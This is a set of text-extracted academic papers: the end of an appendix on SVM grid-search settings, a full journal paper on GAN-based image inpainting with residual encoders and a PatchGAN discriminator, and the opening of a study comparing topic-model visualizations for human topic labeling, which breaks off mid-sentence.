respective training set and use RMSE as the metric to be minimized. After obtained the best hyperparameter values, the SVM is retrained using these values on the full respec- tive training set. The specific intervals used in grid search depend on the task. For the performance experiments on synthetic data, we employed an interval of [10−2, 10] for C (regularization coefficient) and �, [10−8, 1] for λ and [10−4, 2] for α. In each run we incrementally in- crease the size of the grid by adding intermediate values on each interval. We keep a linear scale for the SSTK hyperparameters and a logarithmic scale for C and �. As an example, Table 6 shows the re- sulting grids when the grid value is 4 for each hyper- parameter. For all NLP experiments the grid is fixed for all hyperparameters (including γ, the lengthscale value in the RBF kernel), with its corresponding val- ues shown on Table 7. C / � [10−2, 10−1, 1, 10] λ [10−8, 0.33, 0.67, 1] α [10−4, 0.67, 1.33, 2] Table 6: Resulting grids for the performance experiments when grid size is set to 4 for each hyperparameter. C [10−2, 1, 100] � [10−2, 10−1, 1, 10] λ [10−16, 0.25, 0.5] α [1] (fixed) γ [10−3, 0.0178, 0.316, 5.62, 100] Table 7: Grid values for the NLP experiments. 473 474 work_npdyuzu3pngqnlqxfq3y2p2gaa ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-013 23 Image Inpainting Research Based on Deep Learning Zhao Ruixia School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 1364343954@qq.com Zhao Li School of Computer Science and Engineering Xi’an Technological University Xi’an, China E-mail: 332099732@qq.com Abstract—With the rapid development of computer technology, image inpainting has become a research hotspot in the field of deep learning. Image inpainting belongs to the intersection of computer vision and computer graphics, and is an image processing technology between image editing and image generation. The proposal of generative adversarial network effectively improves the problems of poor image inpainting effect and large difference between the inpainting image and the target image, and promotes the development of image inpainting technology. In this paper, the image inpainting is based on the generation of confrontation networks. Its network structure establishes two repair paths, namely the reconstruction path and the generation path, and the two paths correspond to two groups of networks. The encoder and generator in the network respectively complete the encoding and decoding tasks based on the residual network. The discriminator also uses the patch block discriminator on the basis of the residual network to discriminate the authenticity of the image. This paper uses Places2 data set to verify the algorithm, and uses PSNR and SSIM two objective evaluation methods to evaluate the quality of the repaired image. Experiments show that the algorithm inpainting effect is better. Keywords-Image Inpainting; Generation Adversarial Networks; Residual Network; Patch With the development and popularization of computer technology, Internet technology and multimedia technology, digital image processing technology has also developed rapidly. In the process of storage, transmission and use of digital image information, the phenomenon of image information damaged and loss will occur. These damaged areas affect the visual effect of the picture and the integrity of the information, and have a certain impact on the application of the picture. People urgently need a technology and method that can automatically inpainting damaged digital images, so digital image inpainting technology is born. I. INTRODUCTION Image inpainting is one of the most popular areas of deep learning. Its basic principle is to give an image of a damaged or corroded area, and try to use the intact information of the known area of the damaged image to inpainting the damaged area of the image[1-2]. Digital image inpainting methods can be divided into two major categories: traditional image inpainting methods and deep learning-based image repair methods. Traditional image repair methods can be divided into: structure-based image repair technology and texture synthesis-based image inpainting technology. Both image inpainting algorithms based on structure and texture can inpainting the loss of small areas such as folds. With the expansion of the missing areas, the inpainting effect gradually deteriorates. There are problems such as incomplete semantic information and blurred images in the inpainting results, which makes the image inpainting effect ineffective, ideal. The emergence of deep neural networks allows the model to obtain the understanding of image semantic information through multi-level feature extraction, and to a certain extent improves the repair effect of large-area damaged images. As deep learning shows exciting prospects in the fields of image semantic inpainting and situational awareness, and image inpainting algorithms based on deep learning can capture more advanced features of images than traditional inpainting algorithms based on structure and texture, so often used for image inpainting. At present, image inpainting based on generative adversarial networks is a major research hotspot in the field of deep learning image inpainting, which lays a solid foundation for the development of image inpainting technology. file:///E:/æ��é��/Dict/8.9.3.0/resultui/html/index.html#/javascript:; International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 24 A. The basic idea of generating adversarial networks Generative adversarial network is undoubtedly one of the popular artificial intelligence technologies, and was rated as the "Top Ten Global Breakthrough Technologies" in 2018 by the MIT Technology Review. The generative adversarial network is composed of a generative network and a discriminant network. The purpose of the generative network is to estimate the distribution of data samples from a given noise and generate synthetic data. The purpose of the discriminant network is to distinguish the input data from the generated data or the real data. The generative network and the discriminant network are a set of confrontational relationships. The source of the confrontational ideas comes from the zero-sum game in game theory. The two sides of the game use each other's strategy to change their confrontation strategy in an equal game, so as to achieve the goal of winning[3]. It is extended to the generative antagonistic network, that is, the generative network and the discriminant network are the two sides of the game. The optimization goal is to achieve Nash equilibrium[4], the generative network tries to produce closer to real data. Accordingly, the discriminant network tries to distinguish more perfectly between real data and data generated by generators. As a result, the two networks progressed in confrontation, and continued to confront each other after the progress, the data obtained by the generating network became more and more perfect, approaching the real data. B. Development of deep learning models GeneratingSince the input of the GAN generation model is random noise data, in actual applications, there are generally clear variables to control the category or other information for the data to be generated, such as generating specific numbers from 1 to 9 numbers. In order to solve the problem of generating labeled data, Conditional Generative Adversarial Networks are proposed, and information such as category labels and pictures are added to the input to make the image more in line with the target[5]. The foundation of image inpainting technology based on deep learning is the convolutional neural network, which uses the convolutional neural network to extract high-dimensional features and information prediction, which makes the image inpainting technology develop rapidly[6-7]. Because the network of generating model and discriminating model in GAN is too simple, there will be image blur when generating large-size images. In order to generate clear images, Radford A et al.[8] proposed deep convolutional generation adversarial networks. With the emergence of several unsupervised image conversion models, such as CycleGAN[9], DualGAN[10], DiscoGAN[11], it provides better ideas for image inpainting technology. II. NETWORK STRUCTURE Image inpainting not only requires that the results conform to human visual habits, making it difficult for the human eye to detect the traces of inpainting (undetected)[12], meanwhile inpainting the information contained in the missing pictures as much as possible, so that the restored image can be as much as possible Same as the image before the damage. Based on this restoration goal, this paper builds an image inpainting network framework suitable for this article by studying and analyzing the structure principles of GAN. Using the neural network's ability to extract high-dimensional features of images, the structural framework of this paper is built. In this paper, a parallel dual-path framework based on GAN is used: one is to reconstruct the path, and use the given real image and masked image to obtain its complementary image to reconstruct the original image; the other is to generate the path and use the given masked image to inpainting. The input image of the generated path and the input image of the reconstructed path are complementary images of each other. The network structure is built on the basis of the residual network. Its structure includes three parts: encoder, generating network and discriminating network. The image inpainting process in this paper is: (1)Input the masked image and the complement image (the masked image and the supplementary image are the real image) into the encoders E1 and E2 of the reconstruction path and the generation path to encode; (2)The extracted two image features were fused and input into generator G1 and G2; (3)The generator reconstructed image and the real image are input into the discriminator D1 for discrimination; (4)The generated image, the fused image and the real image are input into the discriminator D2 for discrimination; (5)The discriminators D1 and D2 output the discriminant results and feed them back to the encoder, generator and discriminator through the back propagation algorithm to update the network parameters and train the network. The overall structure of the network is shown in Figure 1. file:///E:/æ��é��/Dict/8.9.3.0/resultui/html/index.html#/javascript:; International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 25 Generator G1 Generator G2 Discriminator D2 discriminator D1 Encoder E1 Encoder E2 True or false True or false reconstruc tion path generation path Masked image Complement image Coded information fusion Real image Reconstruction Image generation image Fused image Figure 1. Data flow diagram of GAN A. Encoder The encoder extracts the features of the image based on the residual network. The inputs of encoders E1 and E2 are three-channel images of 256×256 pixels. The residual block is composed of two layers of convolution and one layer of skip link. The first layer uses a convolution kernel of size 3×3. The length is 1 and the padding size is 1. The second layer uses a 3×3 convolution kernel with a sliding step size of 1 and no padding. The residual structure of the encoder is shown in Figure 2. In this paper, there are two parallel paths for image inpainting: reconstruction path and generation path. The network structure of the encoder is the same, and the combination of residual modules is used. The network structure contains 7 residual modules. The network structure of the encoder is shown in Figure 3. Input x Output f(x)+x convolution x identity map convolution Figure 2. Residual structure of the encoder Residual module Output image features Input damaged image Residual module Residual module Residual module Residual module Residual module Residual module Figure 3. Encoder network structure B. Generate network The generating network adopts Res-Net network structure, and uses the residual decoding block to decode the features extracted in the encoding stage. In the generation network, the residual block is used in the decoding stage. The residual block in the decoding stage is composed of three parts: a convolution layer, a deconvolution layer, and a skip link layer. The convolutional layer uses a convolution kernel with a International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 26 size of 3×3, a sliding step size of 1, and a padding of 1. The deconvolution layer uses a 3×3 convolution kernel with a sliding step size of 2 and a padding of 1. After the deconvolution operation, the padding of the output image is 1. The skip link layer performs a deconvolution operation, using a convolution kernel with a size of 3×3, a sliding step size of 2, and a fill of 1. After the deconvolution operation, the output image has a fill of 1. The generated network uses the Spectral Normalization method to normalize the output data. The network structure of the residual block in the decoding stage is shown in Figure 4. A self-attention mechanism has been added to the network. The self-attention mechanism uses residual blocks and uses Short+Long Term to ensure the consistency of the appearance of the generated image. The network structure of the generated network is shown in Figure 5. C. The training principleDiscrimination Network The discrimination network adopts the structure of PatchGAN. The difference between PatchGAN and ordinary GAN is that the output of ordinary GAN is the evaluation of the entire image, and the output of PatchGAN is an N×N matrix. Each element of the N×N matrix represents the original image. The larger receptive field in the map corresponds to a patch in the original picture. This paper runs a patch discriminator on the image in a convolution mode. The discriminator outputs a patch block of 70×70 size, and each element represents the probability value of the real image. This paper judges that the input of the network is a picture, the target picture is used as a positive example, and the inpainting picture is used as a negative example, so as to judge whether the inpainting picture is true. The discriminators D1 and D2 in this paper have the same network structure and use five-layer convolution. The first three layers use a 4×4 convolution kernel with a sliding step size of 1 and a padding of 1; the last two layers use a 4×4 convolution kernel with a sliding step size of 2 and a padding of 1. The discriminant network first extracts the features of the input image, and then analyzes and compares the extracted features. The network structure of the discrimination network is shown in Figure 6. Input OutputConvolutionConvolution Deconvolution Figure 4. Decoding residual block network structure Residual module Residual module Decode residual module Decode residual module self-attention mechanism Decode residual module Output generated image Input image feature Figure 5. Generate network structure diagram Generate image Real image convolution convolution convolution convolution convolution Probability value International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 27 Figure 6. Discriminant network structure diagram III. NETWORK TRAINING In this paper, WGAN-GP loss is used to optimize the network structure. WGAN-GP is an improvement of WGAN. A gradient penalty method is proposed to improve the continuity constraint conditions, making GAN convergence more stable. The loss function of WGAN-GP is composed of the loss LG of the generator and the loss LD of the discriminator. The calculation formula of generator loss can be written as           2 1 1 WGAN D gp gp WGAN D D gp L E D x E D G z L L E D x G z L L L                         (1) Where x represents a randomly selected sample in the data set and  D x represents the result output when the input of the discriminant model is a real sample. WGAN D L Represents the loss function corresponding to the WGAN discriminator, Lgp represents the gradient penalty loss function newly added in WGAN-GP, and  represents the penalty coefficient. IV. EXPERIMENTAL RESULTS AND ANALYSIS A. Experimental environment In order to verify the effectiveness of the algorithm proposed in this article, on the Ubuntu platform, the Python language and the PyTorch deep learning framework are used. Experiment with 5000 images of Place2, a public data set. The image size is 256×256 pixels, and the ratio of 8: 2 is used for training and testing. B. Experimental results Since the image inpainting task is to repair the incomplete part of the image, the data set should be mask processed before the inpainting task. In this paper, the image preprocessing is divided into two methods: random masked and intermediate masked. After the data processing is completed, the image inpainting task is performed. The inpainting result of occlusion in the image is shown in Figure 7. Where (a) represents the damaged image, (b) represents the inpainting image, and (c) represents the real image. The inpainting result of random masked in the image is shown in Figure 8. Where (a) represents the damaged image, (b) represents the inpainting image, and (c) represents the real image. C. Experimental analysis At this stage, there are mainly two kinds of image evaluation methods: subjective evaluation method and objective evaluation method. This article combines the subjective evaluation method and the objective evaluation method to evaluate the repaired image. 1) Subjective evaluation From the experimental results of 4.2, it can be seen that the content of the image inpainting by this method is basically the same as the target image, the color is very similar to the target image, and direct visual observation of the image is real and natural. The inpainting of texture is natural and continuous. 2) Objective evaluation The objective evaluation method uses peak signal-to-noise ratio measurement (PSNR) and structural similarity (SSIM) to evaluate the repaired image. The higher the PSNR, the less distortion in the picture inpainting process, and the better the inpainting picture. SSIM measures the similarity of the two images. A higher value indicates that the two images are more similar. The maximum value is 1. The definition of peak signal-to-noise ratio, the expression is: )log(10PSNR ),(),( M SE 2 f 1 0 1 0 2 0 MSE G NM jiIjiI M i N j          ）（ (2) MSE is the mean square error. The default value is 255, ),(0 jiI represents the pixel value at ),( ji in the real image, ),( jiI represents the pixel value at ),( ji in the inpainting image, and M * N represents the area size of the inpainting image. The definition of structural similaritycan be written as ))(( )2)(2( ),( 2 22 1 22 21 CC CC yxSSIM yxyx xyyx      (3) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 28 x and y represent the two input images, where x  is the average of x, y  is the average of y, 2 y  is the variance of x, 2 y  is the variance of y, xy  is the covariance of x and y, and 1 C , 2 C are Used to maintain a stable constant. L is the dynamic range of pixel values, generally taken as 255. This paper compares four different image inpainting models, using PSNR and SSIM methods to evaluate. (a)damaged image (b)inpainting image (c)real image Figure 7. Inpainting result of intermediate masked International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 29 (a)damaged image (b)inpainting image (c)real image Figure 8. Inpainting result of random masked TABLE I. EVALUATION RESULTS OF PSNR AND SSIM METHODS Image inpainting model PSNR SSIM CE[13] 18.72 0.843 GL[14] 19.90 0.836 GntIpt[15] 20.38 0.855 GMCNN[16] 20.62 0.851 Ours 24.06 0.857 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 30 V. CONCLUDE AND PROSPECT In this paper, the image inpainting network structure is built based on GAN. The residual network is used in the encoding and decoding process to reduce the gradient disappearance and gradient explosion problems. Using the loss function of WGAN-GP to update the network parameters to inpainting the image, not only the similarity of the inpainting image structure, but also the matching degree of the image texture. The Place2 dataset is used for network training and testing. The subjective evaluation method and the objective evaluation method are used to evaluate the inpainting image. The objective evaluation method selects SSIM and PSNR to make an objective evaluation of the inpainting image. The comparison between the image inpainting model and the inpainting model of other papers verifies the effectiveness of the algorithm in this paper. REFERENCES [1] Bertalmio M, Sapiro G, Caselles V, et al. Image inpainting[C]. international conference on computer graphics and interactive techniques, 2000: 417-424. [2] Guillemot C, Meur O L. Image Inpainting : Overview and Recent Advances[J]. IEEE Signal Processing Magazine, 2014, 31(1): 127-144. [3] Goodfellow I, Pouget-Abadie J, Mirza M, et al. Generative adversarial nets[C]//Advances in neural information processing systems. 2014: 2672-2680. [4] Ratliff L J, Burden S A, Sastry S, et al. Characterization and computation of local Nash equilibria in continuous games[C]. allerton conference on communication, control, and computing, 2013: 917-924. [5] Mirza M, Osindero S. Conditional Generative Adversarial Nets[J]. Computer Science, 2014:2672-2680. [6] Pathak D, Krahenbuhl P, Donahue J, et al. Context Encoders: Feature Learning by Inpainting[C]. computer vision and pattern recognition, 2016: 2536-2544. [7] Yang C, Lu X, Lin Z, et al. High-Resolution Image Inpainting Using Multi-scale Neural Patch Synthesis[C]. computer vision and pattern recognition, 2017: 4076-4084. [8] Radford A, Metz L, Chintala S, et al. Unsupervised Representation Learning with Deep Convolutional Generative Adversarial Networks[J]. arXiv: Learning, 2015. [9] Zhu J, Park T, Isola P, et al. Unpaired Image-to-Image Translation Using Cycle-Consistent Adversarial Networks[C]. international conference on computer vision, 2017: 2242-2251. [10] Kim T, Cha M, Kim H, et al. Learning to Discover Cross-Domain Relations with Generative Adversarial Networks[J]. arXiv: Computer Vision and Pattern Recognition, 2017. [11] Yi Z, Zhang H, Tan P, et al. DualGAN: Unsupervised Dual Learning for Image-to-Image Translation[C]. international conference on computer vision, 2017: 2868-2876. [12] Efros A A, Freeman W T. Image quilting for texture synthesis and transfer[C]. international conference on computer graphics and interactive techniques, 2001: 341-346. [13] Pathak D, Krahenbuhl P, Donahue J, et al. Context Encoders: Feature Learning by Inpainting[C]. computer vision and pattern recognition, 2016: 2536-2544. [14] Iizuka S, Simoserra E, Ishikawa H, et al. Globally and locally consistent image completion[J]. ACM Transactions on Graphics, 2017, 36(4). [15] Yu J, Lin Z, Yang J, et al. Generative Image Inpainting with Contextual Attention[C]. computer vision and pattern recognition, 2018: 5505-5514. [16] Wang Y, Tao X, Qi X, et al. Image Inpainting via Generative Multi-column Convolutional Neural Networks[C]. neural information processing systems, 2018: 329-338. work_nptfrj23brdvvauxagfvg2dske ---- Evaluating Visual Representations for Topic Understanding and Their Effects on Manually Generated Topic Labels Alison Smith∗ Tak Yeon Lee∗ Forough Poursabzi-Sangdeh† Jordan Boyd-Graber† Niklas Elmqvist∗ Leah Findlater∗ ∗University of Maryland, College Park, MD †University of Colorado, Boulder, CO {amsmit,tylee}@cs.umd.edu {forough.poursabzisangdeh, jordan.boyd.graber}@colorado.edu {elm,leahkf}@cs.umd.edu Abstract Probabilistic topic models are important tools for indexing, summarizing, and analyzing large document collections by their themes. However, promoting end-user understanding of topics remains an open research prob- lem. We compare labels generated by users given four topic visualization techniques— word lists, word lists with bars, word clouds, and network graphs—against each other and against automatically generated labels. Our basis of comparison is participant ratings of how well labels describe documents from the topic. Our study has two phases: a label- ing phase where participants label visualized topics and a validation phase where different participants select which labels best describe the topics’ documents. Although all visual- izations produce similar quality labels, sim- ple visualizations such as word lists allow par- ticipants to quickly understand topics, while complex visualizations take longer but expose multi-word expressions that simpler visualiza- tions obscure. Automatic labels lag behind user-created labels, but our dataset of man- ually labeled topics highlights linguistic pat- terns (e.g., hypernyms, phrases) that can be used to improve automatic topic labeling al- gorithms. 1 Comprehensible Topic Models Needed A central challenge of the “big data” era is to help users make sense of large text collections (Hotho et al., 2005). A common approach to summarizing the main themes in a corpus is to use topic models (Blei, 2012), which are data-driven statistical models that identify words that appear together in similar docu- ments. These sets of words or “topics” evince inter- nal coherence and can help guide users to relevant documents. For instance, an FBI investigator sifting through the released Hillary Clinton e-mails may see a topic with the words “Benghazi”, “Libya”, “Blu- menthal”, and “success”, spurring the investigator to dig deeper to find further evidence of inappro- priate communication with longtime friend Sidney Blumenthal regarding Benghazi. A key challenge for topic modeling, however, is how to promote end-user understanding of individ- ual topics and the overall model. Most existing topic presentations use simple word lists (Chaney and Blei, 2012; Eisenstein et al., 2012). Although a variety of alternative topic visualization techniques exist (Sievert and Shirley, 2014; Yi et al., 2005), there has been no systematic assessment to compare them. Beyond exploring different visualization tech- niques, another means of making topics easier for users to understand is to provide descriptive labels to complement a topic’s set of words (Aletras et al., 2014). Unfortunately, manual labeling is slow and, while automatic labeling approaches exist (Lau et al., 2010; Mei et al., 2007; Lau et al., 2011), their effectiveness is not guaranteed for all tasks. To better understand these problems, we use la- beling to evaluate topic model visualizations. Our study compares the impact of four commonly used topic visualization techniques on the labels that users create when interpreting a topic (Figure 1): word lists, word lists with bars, word clouds, and network graphs. On Amazon Mechanical Turk, one set of users viewed a series of individual topic vi- 1 Transactions of the Association for Computational Linguistics, vol. 5, pp. 1–16, 2017. Action Editor: Timothy Baldwin. Submission batch: 2/2016; Revision batch: 6/2016; Published 1/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. sualizations and provided a label to describe each topic, while a second set of users assessed the qual- ity of those labels alongside automatically generated ones.1 Better labels imply that the topic visualiza- tion provide users a more accurate interpretation (la- beling) of the topic. The four visualization techniques have inherent trade-offs. Perhaps unsurprisingly, there is no mean- ingful difference in the quality of the labels pro- duced from the four visualization techniques. How- ever, simple visualizations (word list and word cloud) support a quick, first-glance understanding of topics, while more complex visualizations (net- work graph) take longer but reveal relationships be- tween words. Also, user-created labels are better received than algorithmically-generated labels, but more detailed analysis uncovers features specific to high-quality labels (e.g., tendency towards abstrac- tion, inclusion of phrases) and the types of topics for which automatic labeling works. These findings motivate future automatic labeling algorithms. 2 Background Presenting the full text of a document corpus is often impractical. For truly large and complex text cor- pora, abstractions, such as topic models, are neces- sary. Here we review probabilistic topic modeling and topic model interfaces. 2.1 Probabilistic Topic Modeling Topic modeling algorithms produce statistical mod- els that discover key themes in documents (Blei, 2012). Many specific algorithms exist; in this work we use Latent Dirichlet Allocation (Blei et al., 2003, LDA) as it is commonly employed. LDA is an un- supervised statistical topic modeling algorithm that considers each document to be a “bag of words” and can scale to large corpora (Zhai et al., 2012; Hoffman et al., 2013; Smola and Narayanamurthy, 2010). Assuming that each document is an admix- ture of topics, inference discovers each topic’s dis- tribution over words and each document’s distribu- tion over topics that best explain the corpus. The set of topics provide a high-level overview of the cor- 1Data available at https://github.com/ alisonmsmith/Papers/tree/master/ TopicRepresentations. pus, and individual topics can link back to the orig- inal documents to support directed exploration. The topic distributions can also be used to present other documents related to a given document. Clustering is hard because there are multiple rea- sonable objectives that are impossible to satisfy si- multaneously (Kleinberg, 2003). Topic modeling evaluation has focused on perplexity, which mea- sures how well a model can predict words in un- seen documents (Wallach et al., 2009b; Jelinek et al., 1977). However, Chang et al. (2009) argue that eval- uations optimizing for perplexity encourage com- plexity at the cost of human interpretability. New- man et al. (2010a) build on this insight, noting that “one indicator of usefulness is the ease by which one could think of a short label to describe the topic.” Unlike previous interpretability studies, here we ex- amine the connection between a topic’s visual repre- sentation (not just its content) and its interpretabil- ity. Recent work has focused on automatic generation of labels for topics. Lau et al. (2011) use Wikipedia articles to automatically label topics. The assump- tion is that for each topic there will be a Wikipedia article title that offers a good representation of the topic. Aletras et al. (2014) use a graph-based ap- proach to better rank candidate labels. They gen- erate a graph from the words in candidate articles and use PageRank to find a representative label. In Section 3 we use an adapted version of the method presented by Lau et. al. (2011) as a representative automatic labeling algorithm. 2.2 Topic Model Visualizations The topic visualization techniques in our study— word list, word list with bars, word cloud, and net- work graph—commonly appear in topic modeling tools. Here, we provide an overview of tools that display an entire topic model or models to the user, while more detail on the individual topic visualiza- tion techniques can be found in Section 3.2. Topical Guide (Gardner et al., 2010), Topic Viz (Eisenstein et al., 2012), and the Topic Model Visualization Engine (Chaney and Blei, 2012) are tools that support corpus understanding and directed browsing through topic models. They display the model overview as an aggregate of underlying topic visualizations. For example, Topical Guide uses hor- 2 https://github.com/alisonmsmith/Papers/tree/master/TopicRepresentations https://github.com/alisonmsmith/Papers/tree/master/TopicRepresentations https://github.com/alisonmsmith/Papers/tree/master/TopicRepresentations Figure 1: Examples of the twelve experimental conditions, each a different visualization of the same topic about the George W. Bush presidential administration and the Iraq War. Rows represent cardinality, or number of topic words shown (five, ten, twenty). Columns represent visualization techniques. For word list and word list with bars, topic words are ordered by their probability for the topic. Word list with bars also includes horizontal bars to represent topic-term probabilities. In the word cloud, words are randomly placed but are sized according to topic-term probabilities. The network graph uses a force-directed layout algorithm to co-locate words that frequently appear together in the corpus. izontal word lists when displaying an overview of an entire topic model but uses a word cloud of the top 100 words for a topic when displaying only a single topic. Topic Viz and the Topic Model Visu- alization Engine both represent topics with vertical word lists; the latter also uses set notation. Other tools provide additional information within topic model overviews, such as the relationship be- tween topics or temporal changes in the model. However, they still require the user to understand individual topics. LDAVis (Sievert and Shirley, 2014) includes information about the relationship between topics in the model. Multi-dimensional scaling projects the model’s topics as circles onto a two-dimensional plane based on their inter-topic distances; the circles are sized by their overall preva- lence. The individual topics, however, are then vi- sualized on demand using a word list with bars. Smith et al. (2014) visualize a topic model using a nested network graph layout called group-in-a- box (Rodrigues et al., 2011, GIB). The individual topics are displayed using a network graph visu- alization, and related topics are displayed within a treemap (Shneiderman, 1992) layout. The result is a visualization where related words cluster within top- ics and related topics cluster in the overall layout. TopicFlow (Smith et al., 2015) visualizes how a model changes over time using a Sankey dia- gram (Riehmann et al., 2005). The individual top- ics are represented both as word lists in the model overview and as word list with bars when view- ing a single topic or comparing between two top- ics. Argviz (Nguyen et al., 2013) captures tempo- ral shifts in topics during a debate or a conversation. The individual topics are presented as word lists in the model overview and using word list with bars for the selected topics. Klein et al. (2015) use a dust- and-magnet visualization (Yi et al., 2005) to visu- alize the force of topics on newspaper issues. The temporal trajectories of several newspapers are dis- played as dust trails in the visualization. The indi- vidual topics are displayed as word clouds. 3 In contrast to these visualizations which sup- port viewing the underlying topics on demand, Ter- mite (Chuang et al., 2012) uses a tabular layout of words and topics to provide an overview of the model to compare across topics. It organizes the model into clusters of related topics based on word overlap. This clustered representation is both space- efficient and speeds corpus understanding. Despite the breadth of topic model visualizations, a small set of individual topic representations are ubiquitous: word list, word list with bars, word cloud, and network graph. In the following sections, we compare these topic visualization techniques. 3 Method: Comparing Visualizations We conduct a controlled online study to compare the four commonly used visualization techniques identi- fied in Section 2: word list, word list with bars, word cloud, and network graph. We also compare effec- tiveness with the number of topic words shown, that is, the cardinality of the visualization: five, ten or twenty topic words. 3.1 Dataset We select a corpus that does not assume domain ex- pertise: 7,156 New York Times articles from January 2007 (Sandhaus, 2008). We model the corpus using an LDA (Blei et al., 2003) implementation in Mal- let (Yao et al., 2009) with domain-specific stopwords and standard hyperparameter settings.2 Our simple setup is by design: our goal is to emulate the “off the shelf” behavior of conventional topic modeling tools used by novice users. Instead of improving the quality of the model using asymmetric priors (Wal- lach et al., 2009a) or bigrams (Boyd-Graber et al., 2014), our topic model has topics of variable qual- ity, allowing us to explore the relationship between topic quality and our task measures. Automatic labels are generated from representa- tive Wikipedia article titles using a technique sim- ilar to Lau et al. (2011). We first index Wikipedia using Apache Lucene.3 To label a topic, we query Wikipedia with the top twenty topic words to re- trieve fifty articles. These articles’ titles comprise our candidate set of labels. We then represent each 2n=50, α =0.1, β =0.01 3http://lucene.apache.org/ article using its TF-IDF vector and calculate the cen- troid (average TF-IDF) of the retrieved articles. To rank and choose the most representative of the set, we calculate the cosine similarity between the cen- troid TF-IDF vector and the TF-IDF vector of each of the articles. We choose the title of the article with the maximum cosine similarity to the centroid. Un- like Lau et al. (2011), we do not include the topic words or Wikipedia title n-grams derived from our label set, as these labels are typically not the best candidates. Although other automatic labeling tech- niques exist, we choose this one as it is representa- tive of general techniques. 3.2 Visualizations As discussed in Section 2, our study compares four of the most common topic visualization tech- niques. To produce a meaningful comparison, the space given to each visualization is held constant: 400 × 250 pixels. Figure 1 shows each visualiza- tion for the three cardinalities (or number of words displayed) for the same topic. Word List The most straightforward topic repre- sentation is a list of the top n words in the topic, ranked by their probability. In practice, topic word lists have many variations. They can be represented horizontally (Gardner et al., 2010; Smith et al., 2015) or vertically (Eisenstein et al., 2012; Chaney and Blei, 2012), with or without commas separating the individual words, or using set notation (Chaney and Blei, 2012). Nguyen et al. (2013) add the weights to the word list by sizing the words based on their probability for the topic, which blurs the boundary with word clouds; however, this approach is not common. We use a horizontal list of equally sized words ordered by the probability p(w|z) for the word w in the topic z. For space efficiency, we organize our word list in two columns and add item numbers to make the ordering explicit. Word List with Bars Combining bar graphs with word lists yields a visual representation that not only conveys the ordering but also the absolute value of the weights associated with the words. We use a similar implementation to Smith et al. (2015) to add horizontal bars to the word list for a topic z where the length of each bar represents the probability p(w|z) for each word w. 4 http://lucene.apache.org/ Figure 2: The labeling task for the network graph and ten words. Users create a short label and full sentence describing the topic and rate their confidence that the label and sentence represent the topic well. Word Cloud The word cloud (or tag cloud) is one of the most popular and well-known text visualiza- tion techniques and is a common visualization for topics. Many options exist for word cloud layout, color scheme, and font size (Mueller, 2012). Ex- isting work on layouts is split between those that size words by their frequency or probability for the topic (Ramage et al., 2010) and those that size by the rank order of the word (Barth et al., 2014). We use a combination of these techniques where the word’s font size is initially set proportional to its probabil- ity in a topic p(w|z). However, when the word is too large to fit in the canvas, the size is gradually decreased (Barth et al., 2014). We use a gray scale to visually distinguish words and display all words horizontally to improve readability. Network Graph Our most complex topic visual- ization is a network graph. We use a similar network graph implementation to Smith et al. (2014), which represents each topic as a node-link diagram, where words are circular nodes with edges drawn between commonly co-occurring words. Each word’s radius is scaled by the probability p(w|z) for the word w in a topic z. While Smith et al. (2014) draw edges based on document-level co-occurrence, we instead use edges to pull together phrases, so they are drawn between words w1 and w2 based on bigram count, specifically if log(count(w1,w2)) > k, with k = 0.1.4 Edge width and color are applied uniformly to fur- ther reduce complexity in the graph. The network graph is displayed using a force-directed graph lay- out algorithm (Fruchterman and Reingold, 1991) where all nodes repel each other but links attract connected nodes. 3.3 Cardinality Although every word has some probability for every topic, p(w|z), visualizations typically display only the top n words. The cardinality may interact with the effectiveness of the different visualization tech- niques (e.g., more complicated visualizations may degrade with more words). We use n ∈{5,10,20}. 3.4 Task and Procedure The study includes two phases with different users. In Labeling (Phase I), users describe a topic given a specific visualization, and we measure speed and self-reported confidence in completing the task. In Validation (Phase II), users select the best and worst among a set of Phase I descriptions and an automat- ically generated description for how well they repre- sent the original topics’ documents. Phase I: Labeling For each labeling task, users see a topic visualization, provide a short label (up 4From k ∈{0.01,0.05,0.1,0.5}, we chose k = 0.1 as the best trade-off between complexity and provided information. 5 Figure 3: The validation task shows the titles of the top ten documents and five potential labels for a topic. Users are asked to pick the best and worst labels. Four labels were created by Phase I users after viewing different visualizations of the topic, while the fifth was generated by the algorithm. The labels are shown in random order. to three words), then give a longer sentence to de- scribe the topic, and finally use a five-point Likert scale to rate their confidence that the label and sen- tence represent the topic well. We also track the time to perform the task. Figure 2 shows an example of a labeling task using the network graph visualization technique with ten words. Labeling tasks are randomly grouped into human intelligence tasks (HIT) on Mechanical Turk5 such that each HIT includes five tasks from the same vi- sualization technique.6 Phase II: Validation In the validation phase, a new set of users assesses the quality of the labels and sentences created in Phase I by evaluating them against documents associated with the given topic. It is important to evaluate the topic labels in con- text; a label that superficially looks good is useless if it is not representative of the underlying documents 5All users are in the US or Canada, have more than fifty previously approved HITs, and have an approval rating greater than 90%. 6We did not restrict users from performing multiple HITs, which may have exposed them to multiple visualization tech- niques. Users completed on average 1.5 HITs. in the corpus. Algorithmically generated labels (not sentences) are also included. Figure 3 shows an ex- ample of the validation task. The user-generated labels and sentences are eval- uated separately. For each task, the user sees the titles of the top ten documents associated with a topic and a randomized set of labels or sentences, one elicited from each of the four visualization tech- niques within a given cardinality. The set of labels also includes an algorithmically generated label. We ask the user to select the “best” and “worst” of the labels or sentences based on how well they describe the documents. Documents are associated to topics based on the probability of the topic, z, given the document, d, p(z|d). Only the title of each docu- ment is initially shown to the user with an option to “show article” (or view the first 400 characters of the document). All labels are lowercased to enforce uniformity. We merge identical labels so users do not see dupli- cates. If a merged label receives a “best” or “worst” vote, the vote is split equally across all of the origi- nal instances (i.e., across multiple visualization tech- niques with that label). Finally, we track task com- 6 pletion time. Each user completes four randomly selected vali- dation tasks as part of a HIT, with the constraint that each task must be from a different topic. We also use ground truth seeding for quality control: each HIT includes one additional test task that has a pur- posefully bad label generated by concatenating three random dictionary words. If the user 